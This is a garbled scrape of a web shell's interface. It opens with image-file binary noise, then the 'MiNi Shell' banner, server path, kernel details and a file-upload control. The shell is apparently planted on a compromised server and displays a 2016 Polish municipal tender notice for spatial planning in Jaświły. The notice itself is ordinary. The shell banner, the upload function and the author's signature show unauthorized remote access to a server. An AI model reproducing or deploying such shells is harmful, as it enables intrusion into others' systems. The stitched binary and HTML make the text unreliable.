JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20160519/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20160519/127584-N-2016.html

<p class="kh_header"><b>Jaświły: Wykonanie  studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Jaświły i zmiany miejscowego planu zagospodarowania przestrzennego gminy Jaświły</b><br>
<b>Numer ogłoszenia: 127584 - 2016; data zamieszczenia: 19.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Jaświły , 19-124 Jaświły, woj. podlaskie, tel. 0-85 7168001, 7278010, faks 0-85 727 80 13.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> ug-jaswily.pbip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie  studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Jaświły i zmiany miejscowego planu zagospodarowania przestrzennego gminy Jaświły.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> A. Przedmiotem zamówienia jest:
1)	Wykonanie opracowania ekofizjograficznego gminy Jaświły na potrzeby sporządzenia studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Jaświły i zmiany miejscowego planu zagospodarowania przestrzennego gminy Jaświły sporządzone zgodnie z Rozporządzeniem Ministra Środowiska z dnia 9 września 2002 r. w sprawie opracowań ekofizjograficznych ( Dz. U z 2002 r. Nr 155, poz. 1298).
2)	Sporządzenie projektu Kompleksowej zmiany Studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Jaświły lub (nowego) Studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Jaświły.
3)	Przygotowanie analiz dotyczących zasadności przystąpienia do sporządzenia zmiany miejscowego planu zagospodarowania przestrzennego gminy Jaświły i stopnia zgodności przewidywanych rozwiązań z ustaleniami  studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Jaświły, zgodnie z art. 14, ust 5 ustawy z dnia 27 marca 2003 r o planowaniu i zagospodarowaniu przestrzennym (Dz. U z 2015 r. poz. 199 z późn. zm.) i zakresem zamierzonych  zmian  planu określonych w pkt. III.
4)	Przygotowanie projektu uchwały Rady Gminy w Jaświłach  w sprawie przystąpienia do    sporządzenia zmiany miejscowego planu zagospodarowania przestrzennego gminy Jaświły, zgodnie z wynikami analiz, o których mowa w pkt 3.
5)	Sporządzenie projektu zmiany miejscowego planu zagospodarowania przestrzennego gminy Jaświły, zgodnie z uchwałą Rady Gminy, o której mowa w pkt 4.

B. Przedmiot zamówienia należy wykonać zgodnie z wymogami:
1)	Ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U.
z 2015 r. poz. 199 z pózn. zm.)
2)	 Rozporządzenia Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie zakresu
projektu miejscowego planu zagospodarowania przestrzennego (Dz. U.  Nr 164, poz.1587).
3)	Rozporządzenia Ministra Infrastruktury z dnia 28 kwietnia 2004 r. w sprawie zakresu
projektu stadium uwarunkowań i kierunków zagospodarowania przestrzennego gminy (Dz. U. Nr 118, poz.1233).
4)	Ustawy z dnia 3 października 2008 r. o udostępnieniu informacji o środowisku i jego
ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na
środowisko (Dz. U. z 2013 poz. 1235 z późn. zm.)
5)	Pozostałymi przepisami mającymi zastosowanie w przedmiocie zamówienia

C. Zakres sporządzanych dokumentów planistycznych

1)	Studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Jaświły należy sporządzić dla obszaru gminy w jej granicach administracyjnych na mapach w skali 1: 10 000. Powierzchnia Gminy Jaświły wynosi 175 km2.
2)	Zmianę miejscowego planu zagospodarowania przestrzennego gminy Jaświły należy sporządzić dla części obszaru gminy zgodnie z zakresem ustalonym uchwałą Rady Gminy Jaświły na mapach w skali 1:1000 lub 1:5000 (dla terenów do zalesienia).
      Wstępny zakres zmiany planu:
a)	zmiana przeznaczenia 8 działek pod przemysł i usługi,
b)	zmiana przeznaczenie 1 działki pod usługi i budownictwo wysokie,
c)	zmiana przeznaczenie 7 działek pod zabudowę zagrodową,
d)	zmiana przeznaczenie  16 działek pod zalesienie,
e)	zmiana przeznaczenie 3 działek pod urządzenia wytwarzające energię z odnawialnych źródeł o mocy przekraczającej 100 kW ze strefami ochronnymi i stację bazową telefonii komórkowej, 
f)	zmiana przeznaczenia 1 działki na powiększenie zakładu zagospodarowania i sortowania  odpadów komunalnych,
g)	zmiana przeznaczenie 9 działek pod zabudowę jednorodzinną,
h)	zmiana przeznaczenie 4 działek pod uprawy polowe,
i)	zmiana przeznaczenie  26 działek pod drogi,

3) W trakcie procedowania i uzgodnień do studium i planu zastrzega się możliwość ujęcia w projektach studium i planu wniosków organów uzgadniających i osób zainteresowanych zmianami.

D. W ramach przedmiotu umowy Wykonawca zobowiązuje się do:

    1) prowadzenia procedury formalno - prawnej sporządzanych dokumentów planistycznych - redakcja ogłoszeń prasowych, obwieszczeń, zawiadomień, wystąpień o uzgodnienie i opinie, wraz z niezbędnymi załącznikami i rozdzielnikiem dla poszczególnych rodzajów dokumentów;
    2) prowadzenia bieżących konsultacji rozwiązań projektowych z Zamawiającym;
    3) przygotowanie materiałów dla Rady Gminy (na które złożą się projekt uchwał, uzasadnienia, załączniki graficzne) oraz prezentacji radnym przyjętych rozwiązań,  
    4) udziału w wyłożeniu projektów dokumentów planistycznych wraz z prognozami oddziaływania na środowisko i udzielania informacji zainteresowanym podczas dyskusji publicznych na temat przyjętych rozwiązań;
    5) prezentacji projektów dokumentów planistycznych podczas posiedzenia Gminnej Komisji Urbanistyczno - Architektonicznej, komisji Rady Gminy, sesji Rady Gminy;
   6) przygotowanie materiałów na spotkania, posiedzenia Rady Gminy, posiedzenia Komisji GKUA i sesje, aby Zamawiający mógł przygotować odpowiednią ilość egzemplarzy (skopiować) i przekazać zainteresowanym;
   7) pisemnego ustosunkowania się do wszystkich ewentualnych wniosków, opinii i uwag wniesionych przez jednostki i organy opiniujące oraz strony biorące czynny udział w postępowaniu;
   8) przygotowania i wprowadzenia zmian w projektach dokumentów planistycznych wynikających z uzyskanych opinii, dokonanych uzgodnień oraz rozpatrzonych i uwzględnionych uwag;
   9)  przygotowanie listy nieuwzględnionych uwag;
   10) opracowanie zmiany prognoz oddziaływania na środowisko w związku ze zmianami w projektach dokumentów planistycznych;
   11) udziału w przygotowaniu merytorycznych stanowisk dot. odrzucenia wniosków i uwag oraz ewentualnych wezwań do usunięcia naruszenia prawa,
   12) przygotowanie  dokumentów dotyczących. przeprowadzenia strategicznej oceny oddziaływania na środowisko,  w tym  m.in.  uzasadnienia  i  podsumowania  zgodnie z  art. 42 i 55 ustawy o udostępnieniu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko
   13) przygotowanie   dokumentacji   formalno-prawnej   w   celu   przedłożenia   wojewodzie  do sprawdzenia zgodności z prawem

E. Do opracowania projektów dokumentów Zamawiający udostępni i zapewni:

1) studium uwarunkowań i kierunków zagospodarowanie przestrzennego gminy,
2) miejscowy plany zagospodarowania przestrzennego gminy,
3) dane o ruchu budowlanym w ostatnich latach,
4) plany i inne dokumenty strategiczne
5) dane z ewidencji gruntów
6) ocen aktualności studium oraz planów miejscowych
7) inne  dokumenty  znajduje  się  w  posiadaniu  urzędu, mogące  służyć  do realizacji     przedmiotu zamówienia
8) mapy w skali 1: 10 000 do sporządzenia studium oraz 1:1000 lub 1:5000 do zmiany      planu,
9) publikację ogłoszeń w prasie i na stronach internetowych urzędu,
10)  rozesłanie korespondencji,
11) zorganizowanie posiedzeń Gminnej Komisji Urbanistyczno - Architektonicznej.

F. Wymagania dotyczące wykonania zamówienia
Wykonawca przekaże Zamawiającemu następujące prace w ilościach:
Dotyczące Studium:
1) rysunek studium w skali 1:10 000:
     a) wersja papierowa w technice barwnej - 3 egz.
     b)  cz.  graficzna w formatach: .jpg, - 3 egz.
2) ujednolicony tekst studium:
    a) wersja papierowa - 3 egz.
 b) cz. tekstowa  w formatach: doc. i PDF - 3 egz.

3) Opracowanie ekofizjograficzne:
  a) wersja papierowa - 2 egz.
    b) wersja elektroniczna na nośniku cd/dvd w formatach: .doc, .pdf - 2 egz.
4) Prognoza oddziaływania na środowisko:
  a)wersja papierowa - 3 egz.
    b)wersja elektroniczna na nośniku cd/dvd w formatach: .doc, .pdf - 3 egz.
5) Dokumentacja prac planistycznych dla Wojewody:
wersja papierowa - 1 egz.
Dotyczące zmiany planu:
1) rysunki zmiany planu 
a) wersja papierowa   w skali 1: 1000 (1:2000) lub 1:5000 (tereny do zalesienia - 3 egz.
b) wersja elektroniczna -  w formacie JPG 3 egz.
2) tekst zmiany planu :
     a) wersja papierowa - 3 egz.
  b) wersja elektroniczna w formatach: doc. i PDF - 3 egz.
3) Prognoza oddziaływania na środowisko:
  a) wersja papierowa - 3 egz.
  b) wersja elektroniczna na nośniku cd/dvd w formatach: .doc, .pdf - 3 egz.
4) Dokumentacja prac planistycznych dla Wojewody:
  wersja papierowa - 1 egz..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca będzie zobowiązany wykazać.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek posiadania wiedzy i doświadczenia jeżeli wykaże że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, należycie wykonał co najmniej 2 opracowania studium lub zmian studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy, obejmujące obszar gminy wiejskiej lub miejskiej lub miejsko-wiejskiej, na obszarze której występują obszary form ochrony przyrody w postaci obszaru chronionego krajobrazu lub obszaru Natura 2000 oraz obszarów odnawialnych źródeł energii, o których mowa w art. 10 ust 2a ustawy o planowaniu i zagospodarowaniu przestrzennym w tym w postaci ogniw fotowoltaicznych potwierdzone na załączniku wraz z dołączeniem dowodów, referencji na wykonane usługi. Obszary, o których mowa wyżej nie muszą występować łącznie we wszystkich 2 opracowaniach. Wykonawca składający ofertę wspólną winni złożyć jeden wspólny wykaz</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca będzie zobowiązany wykazać.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek dysponowania osobami zdolnymi do wykonania zamówienia jeżeli wykaże że dysponuje lub będzie dysponował co najmniej . jedną osobę uprawnioną do wykonywania zawodu urbanisty zgodnie z art. 5 ustawy z dnia 27 marca 2003 r .o planowaniu i zagospodarowaniu przestrzennym (t.j. Dz. U. z 2015 r., poz. 199). Zamawiający żąda wykazu osób, które będą uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat ich kwalifikacji, doświadczenia i wykształcenia, zakresu wykonywanych czynności oraz informacje o podstawie do dysponowania tymi osobami wg załącznika wraz z dołączeniem ich oświadczeń.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca będzie zobowiązany wykazać.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - termin wykonania - 2</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień umowy
Zmiana umowy może być dokonana tylko za zgodą obu stron.
Wszystkie zmiany umowy dokonywane są w formie pisemnej i muszą być podpisane przez upoważnionych przedstawicieli obu stron.
Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, dotyczących:
terminu
Termin zakończenia przedmiotu zamówienia ustalony w umowie może ulec zmianie w przypadku wystąpienia niżej wymienionych okoliczności pod warunkiem, że mają one wpływ na termin realizacji całego przedmiotu umowy. Okoliczności mogące spowodować zmianę terminu mogą wynikać z:
zmiany aktów prawnych oraz norm lub normatywów mających zastosowanie do przedmiotu umowy
opóźnień w uzyskaniu materiałów źródłowych lub opinii i uzgodnień
konieczności powtórzenia części procedury związanej z uchwaleniem studium i planu
konieczność  przeprowadzenia ponownych  wyłożeń  dokumentów  w wyniku  uchylenia  uchwał przez organ nadzorczy lub sąd,
konieczności uzyskania ponownych lub dodatkowych uzgodnień, czy wyjaśnień realizacji  usług dodatkowych, zamiennych lub zaniechania części usług.
W okolicznościach wyżej wymienionych strony ustalają nowe terminy umowne, z tym że wielkość zmian musi być powiązana z przyczyną jaka ją spowodowała.
zakresu i wartości umowy
Powodem wprowadzenia zmian w zakresie i wartości umowy mogą być usługi zamienne lub zaniechane.
Wprowadzenie usług zamiennych jest możliwe jeśli jest korzystne dla zamawiającego na etapie realizacji umowy lub przyniesie korzystne skutki w trakcie eksploatacji przedmiotu umowy
Wprowadzenie usług zaniechanych jest możliwe jeśli:
konieczność rezygnacji z tych usług jest niezbędna dla prawidłowego wykonania przedmiotu umowy
zaistniały istotne zmiany okoliczności powodujące, że wykonanie części usług nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy.
zmian osób reprezentujących strony umowy
W przypadku zmian osób uprawnionych do reprezentowania zamawiającego lub wykonawcy strony dokonają stosownych zmian w umowie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> ug-jaswily.pbip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Jaświły, Jaświły 7, 19-124 Jaświły..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.06.2016 godzina 10:00, miejsce: Urząd Gminy Jaświły, Jaświły 7, 19-124 Jaświły..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com